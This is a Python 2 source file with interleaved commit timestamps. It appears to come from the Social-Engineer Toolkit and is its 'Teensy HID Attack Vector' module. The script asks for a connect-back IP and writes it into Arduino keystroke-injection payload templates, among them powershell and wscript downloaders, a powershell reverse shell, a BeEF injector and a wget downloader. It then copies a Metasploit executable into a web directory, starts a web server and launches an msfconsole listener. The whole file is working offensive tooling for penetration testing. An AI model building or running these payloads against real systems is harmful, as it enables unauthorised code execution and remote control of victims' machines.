2012-12-31 22:11:37 +00:00
#!/usr/bin/env python
############################
#
# Teensy HID Attack Vector
#
############################
import sys
import re
import os
import subprocess
import datetime
from src . core . setcore import *
# pull metasploit path
msf_path = meta_path ( )
# check operating system
operating_system = check_os ( )
now = datetime . datetime . today ( )
if operating_system != " windows " : import pexpect
2013-04-26 01:28:38 +00:00
# check to see if setdir is created
if not os . path . isdir ( setdir + " /reports/ " ) :
os . makedirs ( setdir + " /reports/ " )
2012-12-31 22:11:37 +00:00
definepath = os . getcwd ( )
# define if use apache or not
apache = 0
# open set_config here
apache_check = file ( " %s /config/set_config " % ( definepath ) , " r " ) . readlines ( )
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check :
2013-03-16 19:47:25 +00:00
# strip \r\n
line = line . rstrip ( )
# if apache is turned on get things ready
match = re . search ( " APACHE_SERVER=ON " , line )
# if its on lets get apache ready
if match :
for line2 in apache_check :
# set the apache path here
match2 = re . search ( " APACHE_DIRECTORY= " , line2 )
if match2 :
line2 = line2 . rstrip ( )
apache_path = line2 . replace ( " APACHE_DIRECTORY= " , " " )
apache = 1
2012-12-31 22:11:37 +00:00
# grab info from config file
2013-04-15 14:26:00 +00:00
fileopen = file ( setdir + " /teensy " , " r " )
2012-12-31 22:11:37 +00:00
counter = 0
payload_counter = 0
for line in fileopen :
2013-03-16 19:47:25 +00:00
line = line . rstrip ( )
if counter == 0 :
choice = str ( line )
if counter == 1 :
payload_counter = 1
counter = counter + 1
2012-12-31 22:11:37 +00:00
if choice != " 14 " :
2013-03-16 19:47:25 +00:00
# Open the IPADDR file
if check_options ( " IPADDR= " ) != 0 :
ipaddr = check_options ( " IPADDR= " )
else :
ipaddr = raw_input ( setprompt ( [ " 6 " ] , " IP address to connect back on " ) )
update_options ( " IPADDR= " + ipaddr )
2012-12-31 22:11:37 +00:00
2013-04-15 14:26:00 +00:00
if not os . path . isfile ( setdir + " /teensy " ) :
2013-03-16 19:47:25 +00:00
print_error ( " FATAL:Something went wrong, the Teensy config file was not created. " )
exit_set ( )
2012-12-31 22:11:37 +00:00
def writefile ( filename , now ) :
2013-03-16 19:47:25 +00:00
fileopen = file ( " src/teensy/ %s " % filename , " r " )
2013-04-15 14:26:00 +00:00
filewrite = file ( setdir + " /reports/teensy_ %s .pde " % ( now ) , " w " )
2013-03-16 19:47:25 +00:00
for line in fileopen :
match = re . search ( " IPADDR " , line )
if match :
line = line . replace ( " IPADDR " , ipaddr )
match = re . search ( " 12,12,12,12 " , line )
if match :
ipaddr_replace = ipaddr . replace ( " . " , " , " , 4 )
line = line . replace ( " 12,12,12,12 " , ipaddr_replace )
filewrite . write ( line )
filewrite . close ( )
2012-12-31 22:11:37 +00:00
# powershell downloader
if choice == " 1 " :
2013-03-16 19:47:25 +00:00
writefile ( " powershell_down.pde " , now )
2012-12-31 22:11:37 +00:00
# wscript downloader
if choice == " 2 " :
2013-03-16 19:47:25 +00:00
writefile ( " wscript.pde " , now )
2012-12-31 22:11:37 +00:00
# powershell reverse
if choice == " 3 " :
2013-03-16 19:47:25 +00:00
writefile ( " powershell_reverse.pde " , now )
2012-12-31 22:11:37 +00:00
# beef injector
if choice == " 4 " :
2013-03-16 19:47:25 +00:00
writefile ( " beef.pde " , now )
2012-12-31 22:11:37 +00:00
# java applet downloader
if choice == " 5 " :
2013-03-16 19:47:25 +00:00
writefile ( " java_applet.pde " , now )
2012-12-31 22:11:37 +00:00
# gnome wget downloader
if choice == " 6 " :
2013-03-16 19:47:25 +00:00
writefile ( " gnome_wget.pde " , now )
2012-12-31 22:11:37 +00:00
if choice == " 13 " :
2013-03-16 19:47:25 +00:00
writefile ( " peensy.pde " , now )
payload_counter = 0
2012-12-31 22:11:37 +00:00
# save our stuff here
2013-04-15 14:26:00 +00:00
print bcolors . BLUE + " \n [*] PDE file created. You can get it under ' %s /reports/teensy_ %s .pde ' " % ( setdir , now ) + bcolors . ENDC
2012-12-31 22:11:37 +00:00
print bcolors . GREEN + ' [*] Be sure to select " Tools " , " Board " , and " Teensy 2.0 (USB/KEYBOARD) " in Arduino ' + bcolors . ENDC
print bcolors . RED + " \n [*] If your running into issues with VMWare Fusion and the start menu, uncheck \n the ' Enable Key Mapping ' under preferences in VMWare " + bcolors . ENDC
pause = raw_input ( " Press {return} to continue. " )
if payload_counter == 1 :
2013-03-16 19:47:25 +00:00
if apache == 0 :
2013-04-15 14:26:00 +00:00
subprocess . Popen ( " mkdir %s /web_clone/;cp %s /msf.exe %s /web_clone/x.exe 1> /dev/null 2> /dev/null " % ( setdir , setdir , setdir ) , shell = True ) . wait ( )
2013-03-16 19:47:25 +00:00
if operating_system != " windows " :
child = pexpect . spawn ( " python src/html/web_server.py " )
if apache == 1 :
2013-04-15 14:26:00 +00:00
subprocess . Popen ( " cp %s /msf.exe %s /x.exe " % ( setdir , apache_path ) , shell = True ) . wait ( )
if os . path . isfile ( setdir + " /meta_config " ) :
2013-03-16 19:47:25 +00:00
print bcolors . BLUE + " \n [*] Launching MSF Listener... "
print bcolors . BLUE + " [*] This may take a few to load MSF... " + bcolors . ENDC
try :
if operating_system != " windows " :
2013-12-11 18:09:51 +00:00
child1 = pexpect . spawn ( " ruby %s /msfconsole -L -r %s /meta_config " % ( msf_path , setdir ) )
2013-03-16 19:47:25 +00:00
child1 . interact ( )
except :
if operating_system != " windows " :
if apache == 0 :
child . close ( )
child1 . close ( )
